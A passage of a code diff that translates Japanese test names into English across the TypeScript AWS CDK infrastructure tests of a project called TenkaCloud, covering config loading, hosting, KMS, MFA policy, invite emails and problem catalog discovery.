+  it("should return undefined when CDK_PARAM_DEPLOY_CONCURRENT_BUILD_LIMIT is unset (defer to account-level quota)", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -179,7 +179,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.deployConcurrentBuildLimit).toBeUndefined();
   });
 
-  it("CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true で participantPortal が runtimeConfig 付きで返るべき", () => {
+  it("should return participantPortal with runtimeConfig when CDK_PARAM_ENABLE_PARTICIPANT_PORTAL=true", () => {
     const cfg = resolveAppConfig({
       env: baseEnv({
         CDK_PARAM_ENABLE_PARTICIPANT_PORTAL: "true",
@@ -206,7 +206,7 @@ describe("resolveAppConfig", () => {
     expect(cfg.participantPortal).toBeUndefined();
   });
 
-  it("Issue #1031: adminConsoleHostingInputs / adminConsoleOriginForCors field は AppConfig から除去されているべき", () => {
+  it("Issue #1031: adminConsoleHostingInputs / adminConsoleOriginForCors fields should be removed from AppConfig", () => {
     // admin-console-hosting は backend URL の cross-stack ref で立つようになり、 env-var 経由の
     // gate は廃止された。 AppConfig 出力に該当 field が含まれないことで env-var 経路 regression を防ぐ。
     const cfg = resolveAppConfig({
@@ -225,7 +225,7 @@ describe("resolveAppConfig", () => {
     expect((cfg as Record<string, unknown>).adminConsoleOriginForCors).toBeUndefined();
   });
 
-  it("CDK_PARAM_IDP_NAME / SYSTEM_ADMIN_ROLE_NAME のデフォルトを process.env に注入すべき (SBT ref-arch 互換)", () => {
+  it("should inject defaults for CDK_PARAM_IDP_NAME / SYSTEM_ADMIN_ROLE_NAME into process.env (SBT ref-arch compatible)", () => {
     const env = baseEnv();
     expect(env.CDK_PARAM_IDP_NAME).toBeUndefined();
     expect(env.CDK_PARAM_SYSTEM_ADMIN_ROLE_NAME).toBeUndefined();
@@ -244,7 +244,7 @@ describe("resolveAppConfig", () => {
   // 許容する (`${MONTHLY_COST_LIMIT_USD:-50}` で `"50"` が JSON に入る) ため、 resolve は
   // string を Number として扱う必要がある。 env override は process.env 直読みのため本
   // test では config.json default (= "50") が正しく Number 化されることだけを pin する。
-  it("monthlyCostLimitUsd は config.json の string '50' を number 50 に正規化するべき", () => {
+  it("monthlyCostLimitUsd should normalize string '50' from config.json to number 50", () => {
     const cfg = resolveAppConfig({
       env: baseEnv(),
       binDir: BIN_DIR,
@@ -258,7 +258,7 @@ describe("resolveAppConfig", () => {
 });
 
 describe("resolveApiKeyValue", () => {
-  it("env に値があればそれをそのまま返すべき", () => {
+  it("should return env as-is when set", () => {
     const value = resolveApiKeyValue({
       env: { MY_KEY: "from-env" },
       envVar: "MY_KEY",
@@ -270,7 +270,7 @@ describe("resolveApiKeyValue", () => {
     expect(value).toBe("from-env");
   });
 
-  it("dev 環境では deterministic default を返すべき", () => {
+  it("should return a deterministic default in the dev environment", () => {
     const value = resolveApiKeyValue({
       env: {},
       envVar: "MY_KEY",
@@ -282,7 +282,7 @@ describe("resolveApiKeyValue", () => {
     expect(value).toBe("tenkacloud-development-platinum-tier-key-default-do-not-share");
   });
 
-  it("production / staging 等の isProductionLike では env 必須で throw すべき", () => {
+  it("should throw on missing env in isProductionLike (production / staging etc.)", () => {
     expect(() =>
       resolveApiKeyValue({
         env: {},

--- a/infrastructure/test/app-plane-core/build-app-plane-core.test.ts
+++ b/infrastructure/test/app-plane-core/build-app-plane-core.test.ts
@@ -48,7 +48,7 @@ function synth(): Template {
 }
 
 describe("buildAppPlaneCore", () => {
-  it("ApplicationAdminConsoleHosting / IdentityProvider / ApiGateway を Stack 直下に生成すべき (= CFn 物理差分 0 件 invariant)", () => {
+  it("should generate ApplicationAdminConsoleHosting / IdentityProvider / ApiGateway directly under the Stack (= 0 CFn physical diff invariant)", () => {
     const template = synth();
     // builder は scope = stack に対して 3 つの sub-construct を生成する。
     // 各 sub-construct は内部に複数の CFn resource を持つ。 stack 直下に下記が存在することで
@@ -62,14 +62,14 @@ describe("buildAppPlaneCore", () => {
     template.resourceCountIs("AWS::CloudFront::Distribution", 1);
   });
 
-  it("runtime-config.json 用の BucketDeployment custom resource を 1 件作るべき (= deployRuntimeConfig が呼ばれた証跡)", () => {
+  it("should create 1 BucketDeployment custom resource for runtime-config.json (evidence that deployRuntimeConfig was invoked)", () => {
     const template = synth();
     // BucketDeployment は AWS::CloudFormation::CustomResource として template に乗る。
     // hosting の runtime-config.json が apiGateway 確定後に配置されることを示す。
     template.hasResource("Custom::CDKBucketDeployment", Match.objectLike({}));
   });
 
-  it("UserPoolClient の callback URL は ApplicationAdminConsoleHosting の distribution URL を参照すべき", () => {
+  it("UserPoolClient callback URL should reference the ApplicationAdminConsoleHosting distribution URL", () => {
     const template = synth();
     // UserPoolClient の CallbackURLs / LogoutURLs に CloudFront distribution domain への
     // Fn::Join 参照が入る (= 順序依存)。 hosting が先に作られて identity に URL を渡す
@@ -83,7 +83,7 @@ describe("buildAppPlaneCore", () => {
     expect(logouts.length).toBeGreaterThan(0);
   });
 
-  it("戻り値の applicationAdminConsoleUrl は hosting.distributionUrl と一致すべき", () => {
+  it("the returned applicationAdminConsoleUrl should equal hosting.distributionUrl", () => {
     const app = new cdk.App();
     const stack = new cdk.Stack(app, "TestStack", {
       env: { account: "123456789012", region: "ap-northeast-1" },

--- a/infrastructure/test/application-admin-console-hosting.test.ts
+++ b/infrastructure/test/application-admin-console-hosting.test.ts
@@ -36,14 +36,14 @@ describe("ApplicationAdminConsoleHosting", () => {
   });
 
   describe("テナント ID を渡してインスタンス化したとき", () => {
-    it("S3 Bucket / CloudFront Distribution / OAI を 1 セット作るべき", () => {
+    it("should create 1 set of S3 Bucket / CloudFront Distribution / OAI", () => {
       const template = synth("tenant-1");
       template.resourceCountIs("AWS::S3::Bucket", 1);
       template.resourceCountIs("AWS::CloudFront::Distribution", 1);
       template.resourceCountIs("AWS::CloudFront::CloudFrontOriginAccessIdentity", 1);
     });
 
-    it("S3 Bucket は public access を完全に block すべき", () => {
+    it("S3 Bucket should fully block public access", () => {
       const template = synth("tenant-1");
       template.hasResourceProperties("AWS::S3::Bucket", {
         PublicAccessBlockConfiguration: {
@@ -55,7 +55,7 @@ describe("ApplicationAdminConsoleHosting", () => {
       });
     });
 
-    it("S3 Bucket は server-side encryption を要求すべき", () => {
+    it("S3 Bucket should require server-side encryption", () => {
       const template = synth("tenant-1");
       template.hasResourceProperties("AWS::S3::Bucket", {
         BucketEncryption: {
@@ -66,7 +66,7 @@ describe("ApplicationAdminConsoleHosting", () => {
       });
     });
 
-    it("CloudFront Distribution は HTTPS リダイレクトと SPA fallback (403/404 → /index.html 200) を持つべき", () => {
+    it("CloudFront Distribution should have HTTPS redirect and SPA fallback (403/404 → /index.html 200)", () => {
       const template = synth("tenant-1");
       template.hasResourceProperties("AWS::CloudFront::Distribution", {
         DistributionConfig: {
@@ -82,7 +82,7 @@ describe("ApplicationAdminConsoleHosting", () => {
 
     // Issue #896: CSP3 spec で wildcard は **leftmost only**。 中段 `*` 入りの host-source は
     // ブラウザが silently ignore して全 fetch が \"Refused to connect by CSP\" で fail する。
-    it("Content-Security-Policy connect-src は middle wildcard を含むべきでない (CSP3 spec)", () => {
+    it("Content-Security-Policy connect-src should not contain middle wildcards (CSP3 spec)", () => {
       const template = synth("tenant-1");
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -92,7 +92,7 @@ describe("ApplicationAdminConsoleHosting", () => {
       expect(cspJson).not.toContain("*.lambda-url.*");
     });
 
-    it("Content-Security-Policy connect-src に execute-api / lambda-url / cognito を含むべき", () => {
+    it("Content-Security-Policy connect-src should include execute-api / lambda-url / cognito", () => {
       const template = synth("tenant-1");
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -104,7 +104,7 @@ describe("ApplicationAdminConsoleHosting", () => {
       expect(cspJson).toContain("amazoncognito.com");
     });
 
-    it("distributionDomainName と distributionUrl を property として公開すべき", () => {
+    it("should expose distributionDomainName and distributionUrl as properties", () => {
       const app = new cdk.App();
       const stack = new cdk.Stack(app, "TestStack");
       const hosting = new ApplicationAdminConsoleHosting(stack, "Hosting", {
@@ -116,7 +116,7 @@ describe("ApplicationAdminConsoleHosting", () => {
   });
 
   describe("pooled テナントの場合 (tenantId = pooled)", () => {
-    it("silo と同じ構造 (Bucket / Distribution / OAI) を持つべき (構造は分岐させない設計)", () => {
+    it("should mirror the silo structure (Bucket / Distribution / OAI) (no structural divergence by design)", () => {
       const template = synth("pooled");
       template.resourceCountIs("AWS::S3::Bucket", 1);
       template.resourceCountIs("AWS::CloudFront::Distribution", 1);
@@ -156,12 +156,12 @@ describe("ApplicationAdminConsoleHosting", () => {
       throw new Error("runtime-config.json asset not found");
     }
 
-    it("BucketDeployment Custom Resource が 2 個に増えるべき (dist と runtime-config)", () => {
+    it("should grow to 2 BucketDeployment Custom Resources (dist and runtime-config)", () => {
       const { template } = synthWithRuntimeConfig();
       template.resourceCountIs("Custom::CDKBucketDeployment", 2);
     });
 
-    it("CloudFront 既存 distribution が同じ Bucket に対して使われ続けるべき (新 Bucket を作らない)", () => {
+    it("should keep using the existing CloudFront distribution against the same Bucket (no new Bucket)", () => {
       const { template } = synthWithRuntimeConfig();
       template.resourceCountIs("AWS::S3::Bucket", 1);
       template.resourceCountIs("AWS::CloudFront::Distribution", 1);

--- a/infrastructure/test/cdk-aspect/codebuild-use-aws-managed-kms.test.ts
+++ b/infrastructure/test/cdk-aspect/codebuild-use-aws-managed-kms.test.ts
@@ -20,7 +20,7 @@ function buildStackWithCodeBuild(): Template {
 }
 
 describe("CodeBuildUseAwsManagedKms", () => {
-  it("CodeBuild Project から EncryptionKey property が削除されるべき (= AWS-managed default にフォールバック)", () => {
+  it("should remove the EncryptionKey property from the CodeBuild Project (fall back to AWS-managed default)", () => {
     const template = buildStackWithCodeBuild();
     const projects = template.findResources("AWS::CodeBuild::Project");
     const projectKeys = Object.keys(projects);
@@ -30,12 +30,12 @@ describe("CodeBuildUseAwsManagedKms", () => {
     }
   });
 
-  it("'EncryptionKey' を含む Construct path の AWS::KMS::Key resource は template から消えるべき", () => {
+  it("should remove AWS::KMS::Key resources whose Construct path contains 'EncryptionKey' from the template", () => {
     const template = buildStackWithCodeBuild();
     template.resourceCountIs("AWS::KMS::Key", 0);
   });
 
-  it("CodeBuild Role の IAM Policy の kms:* statement は除去されるべき (= 残った statement に kms action が無い)", () => {
+  it("should strip kms:* statements from the CodeBuild Role IAM Policy (no kms action remains)", () => {
     const template = buildStackWithCodeBuild();
     const policies = template.findResources("AWS::IAM::Policy");
     for (const policy of Object.values(policies)) {
@@ -59,7 +59,7 @@ describe("CodeBuildUseAwsManagedKms", () => {
     }
   });
 
-  it("CodeBuild Role の IAM Policy の Resource に Fn::GetAtt EncryptionKey 参照は残らないべき", () => {
+  it("should leave no Fn::GetAtt EncryptionKey reference in the CodeBuild Role IAM Policy Resource", () => {
     const template = buildStackWithCodeBuild();
     const policies = template.findResources("AWS::IAM::Policy");
     for (const policy of Object.values(policies)) {
@@ -68,7 +68,7 @@ describe("CodeBuildUseAwsManagedKms", () => {
     }
   });
 
-  it("EncryptionKey と無関係な KMS Key (= 別用途) は影響を受けないべき", () => {
+  it("should leave KMS Keys unrelated to EncryptionKey untouched (different use)", () => {
     const app = new App();
     const stack = new Stack(app, "OtherStack");
     new Key(stack, "DataAtRestKey", { description: "別用途の KMS、削除されてはいけない" });
@@ -77,7 +77,7 @@ describe("CodeBuildUseAwsManagedKms", () => {
     template.resourceCountIs("AWS::KMS::Key", 1);
   });
 
-  it("mixed Resource (EncryptionKey + 他 ARN) の statement は維持されるべき (.every() defensive)", async () => {
+  it("should keep statements with mixed Resources (EncryptionKey + other ARNs) (.every() defensive)", async () => {
     const { App, Aspects, Stack } = await import("aws-cdk-lib");
     const { Role, ServicePrincipal, PolicyStatement, Effect, Policy } = await import(
       "aws-cdk-lib/aws-iam"

--- a/infrastructure/test/cdk-aspect/kms-key-short-pending-window.test.ts
+++ b/infrastructure/test/cdk-aspect/kms-key-short-pending-window.test.ts
@@ -23,19 +23,19 @@ function buildHarness(pendingWindow: number): Template {
 }
 
 describe("KmsKeyShortPendingWindow", () => {
-  it("caller が 7 を渡すと PendingWindowInDays=7 になるべき", () => {
+  it("should set PendingWindowInDays=7 when the caller passes 7", () => {
     buildHarness(7).hasResourceProperties("AWS::KMS::Key", { PendingWindowInDays: 7 });
   });
 
-  it("caller が 30 を渡すと PendingWindowInDays=30 になるべき (= production 想定)", () => {
+  it("should set PendingWindowInDays=30 when the caller passes 30 (production)", () => {
     buildHarness(30).hasResourceProperties("AWS::KMS::Key", { PendingWindowInDays: 30 });
   });
 
-  it("caller が範囲内の任意値 (= 14) を渡すと PendingWindowInDays=14 になるべき", () => {
+  it("should set PendingWindowInDays=14 when the caller passes a value in range (= 14)", () => {
     buildHarness(14).hasResourceProperties("AWS::KMS::Key", { PendingWindowInDays: 14 });
   });
 
-  it("複数の KMS Key が混在する stack でも全件に同じ値が適用されるべき", () => {
+  it("should apply the same value to every KMS Key even in stacks with multiple KMS Keys mixed", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new Key(stack, "KeyA");
@@ -51,7 +51,7 @@ describe("KmsKeyShortPendingWindow", () => {
     }
   });
 
-  it("KMS Key が無い stack には影響しないべき", () => {
+  it("should leave stacks without KMS Keys untouched", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     Aspects.of(stack).add(new KmsKeyShortPendingWindow(7));
@@ -61,19 +61,19 @@ describe("KmsKeyShortPendingWindow", () => {
   });
 
   describe("validation", () => {
-    it("AWS KMS の許容範囲 [7, 30] 外は throw するべき", () => {
+    it("should throw outside the AWS KMS allowed range [7, 30]", () => {
       expect(() => new KmsKeyShortPendingWindow(6)).toThrow(/must be an integer in \[7, 30\]/);
       expect(() => new KmsKeyShortPendingWindow(31)).toThrow(/must be an integer in \[7, 30\]/);
       expect(() => new KmsKeyShortPendingWindow(0)).toThrow(/must be an integer in \[7, 30\]/);
       expect(() => new KmsKeyShortPendingWindow(-1)).toThrow(/must be an integer in \[7, 30\]/);
     });
 
-    it("非整数 (= 14.5 / NaN) は throw するべき", () => {
+    it("should throw on non-integers (14.5 / NaN)", () => {
       expect(() => new KmsKeyShortPendingWindow(14.5)).toThrow(/must be an integer/);
       expect(() => new KmsKeyShortPendingWindow(Number.NaN)).toThrow(/must be an integer/);
     });
 
-    it("境界値 (= 7 / 30) は許容すべき", () => {
+    it("should allow boundary values (7 / 30)", () => {
       expect(() => new KmsKeyShortPendingWindow(KMS_PENDING_WINDOW_MIN_DAYS)).not.toThrow();
       expect(() => new KmsKeyShortPendingWindow(KMS_PENDING_WINDOW_MAX_DAYS)).not.toThrow();
     });

--- a/infrastructure/test/config-loader.test.ts
+++ b/infrastructure/test/config-loader.test.ts
@@ -33,31 +33,31 @@ describe("expandPlaceholders", () => {
   });
 
   describe("env が定義されているとき", () => {
-    it("env 値で placeholder を置換するべき", () => {
+    it("should substitute placeholders with env values", () => {
       process.env.MY_VAR = "hello";
       expect(expandPlaceholders(`value=${ph("MY_VAR")}`, process.env)).toBe("value=hello");
     });
 
-    it("default 値があっても env 値を優先するべき", () => {
+    it("should prefer env values over defaults", () => {
       process.env.MY_VAR = "envValue";
       expect(expandPlaceholders(`v=${ph("MY_VAR", "fallback")}`, process.env)).toBe("v=envValue");
     });
   });
 
   describe("env が未定義 + default 値があるとき", () => {
-    it("default 値で placeholder を置換するべき", () => {
+    it("should substitute placeholders with default values", () => {
       delete process.env.MY_VAR;
       expect(expandPlaceholders(`v=${ph("MY_VAR", "fallback")}`, process.env)).toBe("v=fallback");
     });
   });
 
   describe("env が未定義 + default 値も無いとき", () => {
-    it("default では throw するべき", () => {
+    it("should throw by default", () => {
       delete process.env.MY_VAR;
       expect(() => expandPlaceholders(`v=${ph("MY_VAR")}`, process.env)).toThrowError(/MY_VAR/);
     });
 
-    it("tolerant=true なら literal placeholder を残すべき (consumer が読まない field の保護)", () => {
+    it("should retain literal placeholders when tolerant=true (protecting fields the consumer does not read)", () => {
       delete process.env.MY_VAR;
       expect(expandPlaceholders(`v=${ph("MY_VAR")}`, process.env, { tolerant: true })).toBe(
         `v=${ph("MY_VAR")}`,
@@ -91,13 +91,13 @@ describe("loadConfig (環境別 config.json + .env)", () => {
   }
 
   describe("config.json が存在しないとき", () => {
-    it("undefined を返すべき (caller が default にフォールバック)", () => {
+    it("should return undefined (so caller falls back to default)", () => {
       expect(loadConfig("development", baseDir)).toBeUndefined();
     });
   });
 
   describe("dynamoDbConfig セクションを持つ config.json があるとき", () => {
-    it("literal 値をそのまま返すべき", () => {
+    it("should return literal values as-is", () => {
       writeConfig("development", {
         dynamoDbConfig: { billingMode: "PROVISIONED", readCapacity: 5, writeCapacity: 7 },
       });
@@ -109,7 +109,7 @@ describe("loadConfig (環境別 config.json + .env)", () => {
       });
     });
 
-    it("placeholder を env で展開して返すべき", () => {
+    it("should expand placeholders with env and return", () => {
       writeConfig("development", {
         dynamoDbConfig: {
           billingMode: ph("DYNAMODB_BILLING_MODE", "PROVISIONED"),
@@ -129,7 +129,7 @@ describe("loadConfig (環境別 config.json + .env)", () => {
       });
     });
 
-    it("env が未設定なら placeholder の default 値を使うべき", () => {
+    it("should use the placeholder default value when env is unset", () => {
       writeConfig("development", {
         dynamoDbConfig: {
           billingMode: ph("DYNAMODB_BILLING_MODE", "PROVISIONED"),
@@ -151,7 +151,7 @@ describe("loadConfig (環境別 config.json + .env)", () => {
   });
 
   describe("dynamoDbConfig 以外のセクションに env 未設定の placeholder があるとき", () => {
-    it("tolerant モードで literal placeholder を残し、dynamoDbConfig は通常通り使えるべき", () => {
+    it("should retain literal placeholders in tolerant mode while keeping dynamoDbConfig usable as usual", () => {
       writeConfig("development", {
         controlPlaneConfig: {
           systemAdminEmail: ph("TenkaCloud_ADMIN_EMAIL"),

--- a/infrastructure/test/control-plane-stack.test.ts
+++ b/infrastructure/test/control-plane-stack.test.ts
@@ -7,30 +7,30 @@ import { buildInviteEmailBody, INVITE_EMAIL_SUBJECT } from "../lib/control-plane
  * drop。 stack 統合は cdk synth 経路で確認する。
  */
 describe("buildInviteEmailBody (Issue #714 English-only)", () => {
-  it("admin-console origin が解決済なら CloudFront URL を本文に埋めるべき", () => {
+  it("should embed the CloudFront URL in the body once the admin-console origin is resolved", () => {
     const body = buildInviteEmailBody("https://d1234abc.cloudfront.net");
     expect(body).toContain("https://d1234abc.cloudfront.net");
     expect(body).not.toMatch(/http:\/\/localhost/);
   });
 
-  it("origin 未確定 (= Phase 1 deploy) は operator 連絡を促す英語 fallback を返すべき", () => {
+  it("should return an English fallback prompting operator contact when origin is undetermined (Phase 1 deploy)", () => {
     const body = buildInviteEmailBody(undefined);
     expect(body).toMatch(/contact your operator/i);
     expect(body).not.toMatch(/http:\/\/localhost/);
   });
 
-  it("空文字列も fallback 扱いとすべき (= env 未設定と同等)", () => {
+  it("should treat empty string as fallback too (equivalent to unset env)", () => {
     const body = buildInviteEmailBody("");
     expect(body).toMatch(/contact your operator/i);
   });
 
-  it("Cognito placeholder ({username} / {####}) を本文に保持すべき", () => {
+  it("should preserve Cognito placeholders ({username} / {####}) in the body", () => {
     const body = buildInviteEmailBody("https://example.com");
     expect(body).toContain("{username}");
     expect(body).toContain("{####}");
   });
 
-  it("English-only に揃え、 日本語セクションは含めないべき (#714)", () => {
+  it("should keep to English-only without any Japanese section (#714)", () => {
     const body = buildInviteEmailBody("https://example.com");
     expect(body).toContain("Welcome to TenkaCloud Admin Console");
     expect(body).not.toMatch(/へようこそ/);
@@ -39,19 +39,19 @@ describe("buildInviteEmailBody (Issue #714 English-only)", () => {
     expect(body).not.toMatch(/運営にお問い合わせください/);
   });
 
-  it("subject も英語のみで TenkaCloud 名称に上書きされているべき", () => {
+  it("subject should also be English-only and overridden with the TenkaCloud name", () => {
     expect(INVITE_EMAIL_SUBJECT).toMatch(/TenkaCloud Admin Console/);
     expect(INVITE_EMAIL_SUBJECT).not.toMatch(/control plane/i);
     expect(INVITE_EMAIL_SUBJECT).not.toMatch(/招待/);
   });
 
-  it("URL は body に 1 度だけ出現するべき (= 旧 ja+en 重複を排除)", () => {
+  it("the URL should appear in the body exactly once (drop legacy ja+en duplication)", () => {
     const body = buildInviteEmailBody("https://d999.cloudfront.net");
     const matches = body.match(/https:\/\/d999\.cloudfront\.net/g);
     expect(matches).toHaveLength(1);
   });
 
-  it("各セクションを空行で分離し、 改行 collapse 耐性のある形にすべき (#714)", () => {
+  it("should separate sections with blank lines and stay resilient against newline collapsing (#714)", () => {
     const body = buildInviteEmailBody("https://example.com");
     // 空行が body に最低 1 つあり、 welcome / key:value block / next step instruction が分離される
     expect(body).toMatch(/\n\n/);

--- a/infrastructure/test/control-plane/mfa-policy.test.ts
+++ b/infrastructure/test/control-plane/mfa-policy.test.ts
@@ -13,27 +13,27 @@ import {
  * SMS なし / 12 文字以上 / 4 種混在 を baseline とする。
  */
 describe("SystemAdmin の Cognito UserPool MFA / password policy (Issue #1035)", () => {
-  it("MFA は REQUIRED (= ON) に強制すべき", () => {
+  it("should force MFA to REQUIRED (ON)", () => {
     expect(SYSTEM_ADMIN_MFA_CONFIGURATION).toBe("ON");
   });
 
-  it("第二要素は TOTP (SOFTWARE_TOKEN_MFA) のみとし SMS は許可しないべき", () => {
+  it("should accept only TOTP (SOFTWARE_TOKEN_MFA) as the second factor and disallow SMS", () => {
     expect(SYSTEM_ADMIN_ENABLED_MFAS).toEqual(["SOFTWARE_TOKEN_MFA"]);
     expect(SYSTEM_ADMIN_ENABLED_MFAS).not.toContain("SMS_MFA");
   });
 
-  it("password 最小長は 12 文字以上であるべき (SBT default 8 文字を上書き)", () => {
+  it("password minimum length should be 12 or more (overriding SBT default 8)", () => {
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.MinimumLength).toBeGreaterThanOrEqual(12);
   });
 
-  it("password は lower / upper / number / symbol の 4 種を必須にすべき", () => {
+  it("password should require all 4 of lower / upper / number / symbol", () => {
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.RequireLowercase).toBe(true);
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.RequireUppercase).toBe(true);
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.RequireNumbers).toBe(true);
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.RequireSymbols).toBe(true);
   });
 
-  it("一時パスワード有効期間は 7 日以内に制限すべき (= 招待後の総当たり面を縮減)", () => {
+  it("temporary-password validity should be limited to within 7 days (shrinking brute-force surface after invite)", () => {
     expect(SYSTEM_ADMIN_PASSWORD_POLICY.TemporaryPasswordValidityDays).toBeLessThanOrEqual(7);
   });
 });

--- a/infrastructure/test/discover-problems-catalog.test.ts
+++ b/infrastructure/test/discover-problems-catalog.test.ts
@@ -36,7 +36,7 @@ function writeProblem(category: string, dir: string, body: object): void {
 }
 
 describe("discoverProblemsCatalog", () => {
-  it("metadata.json を持つ全 problem を id → problemDir map で返すべき", () => {
+  it("should return all problems with metadata.json as an id → problemDir map", () => {
     writeProblem("challenges", "hello-world", { id: "hello-world" });
     writeProblem("battles", "security-battle-royale", { id: "security-battle-royale" });
 
@@ -48,7 +48,7 @@ describe("discoverProblemsCatalog", () => {
     });
   });
 
-  it("ディレクトリ名と異なる id を metadata 側で名乗っているときは metadata の id を採用すべき", () => {
+  it("should adopt the metadata id when it differs from the directory name", () => {
     writeProblem("challenges", "physical-dir-name", { id: "logical-id" });
 
     const catalog = discoverProblemsCatalog(workspace);
@@ -56,7 +56,7 @@ describe("discoverProblemsCatalog", () => {
     expect(catalog).toEqual({ "logical-id": "problems/challenges/physical-dir-name" });
   });
 
-  it("problemsRoot 自体が存在しないときは空 map を返し warn すべき", () => {
+  it("should return an empty map and warn when problemsRoot itself does not exist", () => {
     const warn = vi.spyOn(console, "warn").mockImplementation(() => {});
     const missing = path.join(workspace, "missing-root");
 
@@ -68,7 +68,7 @@ describe("discoverProblemsCatalog", () => {
     warn.mockRestore();
   });
 
-  it("metadata.json が無いディレクトリは silent skip するべき (warn しない)", () => {
+  it("should silently skip directories without metadata.json (no warn)", () => {
     const warn = vi.spyOn(console, "warn").mockImplementation(() => {});
     fs.mkdirSync(path.join(workspace, "challenges", "no-metadata"), { recursive: true });
 
@@ -79,7 +79,7 @@ describe("discoverProblemsCatalog", () => {
     warn.mockRestore();
   });
 
-  it("壊れた JSON を持つ metadata は warn して skip し他の problem は採集すべき", () => {
+  it("should warn and skip metadata with broken JSON, collecting the rest", () => {
     const warn = vi.spyOn(console, "warn").mockImplementation(() => {});
     fs.mkdirSync(path.join(workspace, "challenges", "broken"), { recursive: true });
     fs.writeFileSync(path.join(workspace, "challenges", "broken", "metadata.json"), "{not-json");
@@ -93,7 +93,7 @@ describe("discoverProblemsCatalog", () => {
     warn.mockRestore();
   });
 
-  it("id field が無い / 空文字の metadata は warn して skip するべき", () => {
+  it("should warn and skip metadata with missing / empty id field", () => {
     const warn = vi.spyOn(console, "warn").mockImplementation(() => {});
     writeProblem("challenges", "no-id", { name: "no id field" });
     writeProblem("challenges", "empty-id", { id: "" });
@@ -107,7 +107,7 @@ describe("discoverProblemsCatalog", () => {
     warn.mockRestore();
   });
 
-  it("ファイル (= ディレクトリでない) が category 直下に紛れていても無視するべき", () => {
+  it("should ignore files (non-directories) mixed directly under category", () => {
     writeProblem("challenges", "hello-world", { id: "hello-world" });
     fs.writeFileSync(path.join(workspace, "README.md"), "not a category");
     fs.writeFileSync(path.join(workspace, "challenges", "stray.txt"), "not a problem dir");
@@ -119,7 +119,7 @@ describe("discoverProblemsCatalog", () => {
 });
 
 describe("discoverProblemsScoring", () => {
-  it("flag 形式の scoring を採集するべき", () => {
+  it("should collect scoring of flag form", () => {
     writeProblem("challenges", "hello-world", {
       id: "hello-world",
       scoring: { kind: "flag", flagOutputKey: "ParameterValue", points: 100 },
@@ -129,7 +129,7 @@ describe("discoverProblemsScoring", () => {
     });
   });
 
-  it("uptime 形式の scoring を採集するべき", () => {
+  it("should collect scoring of uptime form", () => {
     writeProblem("battles", "battle-1", {
       id: "battle-1",
       scoring: {
@@ -147,7 +147,7 @@ describe("discoverProblemsScoring", () => {
     });
   });
 
-  it("scoring を持たない problem は map に含めないべき", () => {
+  it("should not include problems without scoring in the map", () => {
     writeProblem("challenges", "hello-world", { id: "hello-world" });
     writeProblem("challenges", "with-scoring", {
       id: "with-scoring",
@@ -158,7 +158,7 @@ describe("discoverProblemsScoring", () => {
     });
   });
 
-  it("scoring の shape が壊れているもの (= kind 不正 / 必須 field 欠損) は drop するべき", () => {
+  it("should drop entries with broken scoring shape (invalid kind / missing required field)", () => {
     writeProblem("challenges", "broken-1", {
       id: "broken-1",
       scoring: { kind: "wrong-kind" },
@@ -179,7 +179,7 @@ describe("discoverProblemsScoring", () => {
 
 // ADR-008 Phase 3 (Issue #642): visibility 抜き出し
 describe("discoverProblemsVisibility (Issue #642)", () => {
-  it("visibility=private の問題だけを map にすべき (public は省略)", () => {
+  it("should map only visibility=private problems (omit public)", () => {
     writeProblem("challenges", "public-one", { id: "public-one", visibility: "public" });
     writeProblem("battles", "private-one", { id: "private-one", visibility: "private" });
     writeProblem("battles", "no-visibility", { id: "no-visibility" });

--- a/infrastructure/test/env-encoding.test.ts
+++ b/infrastructure/test/env-encoding.test.ts
@@ -12,7 +12,7 @@ import { decodeLargeEnvValue, encodeLargeEnvValue } from "../lib/utils/env-encod
  */
 
 describe("encodeLargeEnvValue + decodeLargeEnvValue (#810)", () => {
-  it("encode → decode で元の JSON 文字列を復元すべき", () => {
+  it("should restore the original JSON string through encode → decode", () => {
     const original = JSON.stringify({
       "hello-world": { kind: "flag", flagOutputKey: "ParameterValue", points: 100 },
     });
@@ -21,7 +21,7 @@ describe("encodeLargeEnvValue + decodeLargeEnvValue (#810)", () => {
     expect(decoded).toBe(original);
   });
 
-  it("UTF-8 multibyte (JA description) を含む JSON も roundtrip すべき", () => {
+  it("should roundtrip JSON containing UTF-8 multibyte (JA description)", () => {
     const original = JSON.stringify({
       "hello-world": {
         description: "AWS Console から SSM Parameter Store にアクセスして値を読む問題",
@@ -31,31 +31,31 @@ describe("encodeLargeEnvValue + decodeLargeEnvValue (#810)", () => {
     expect(decodeLargeEnvValue(encoded)).toBe(original);
   });
 
-  it("encode 結果は base64 で gzip magic (H4s) を prefix に持つべき", () => {
+  it("encode output should be base64 prefixed with gzip magic (H4s)", () => {
     const encoded = encodeLargeEnvValue('{"a":1}');
     expect(encoded.startsWith("H4s")).toBe(true);
   });
 
-  it("plain JSON (= 旧形式 / test fixture) は decode せずそのまま返すべき (backward compat)", () => {
+  it("should return plain JSON (legacy format / test fixture) without decoding (backward compat)", () => {
     const plain = '{"hello-world":{"kind":"flag","points":100}}';
     expect(decodeLargeEnvValue(plain)).toBe(plain);
   });
 
-  it("undefined は undefined のまま返すべき (= caller の fallback を維持)", () => {
+  it("should return undefined as-is (preserve caller fallback)", () => {
     expect(decodeLargeEnvValue(undefined)).toBeUndefined();
   });
 
-  it("空文字は 空文字 のまま返すべき", () => {
+  it("should return empty string as-is", () => {
     expect(decodeLargeEnvValue("")).toBe("");
   });
 
-  it("壊れた base64 (= H4s 始まりだが decode 失敗) は raw を返し caller の JSON parse fallback に任せるべき", () => {
+  it("should return raw on broken base64 (H4s prefix but decode fails) and let caller fall back to JSON parse", () => {
     const broken = "H4sIINVALID==";
     // decode は raw を返す → 上位 parser が JSON.parse で fail → 空 map fallback
     expect(decodeLargeEnvValue(broken)).toBe(broken);
   });
 
-  it("実際の問題 metadata (= 5 kind 全部入り) も roundtrip すべき", () => {
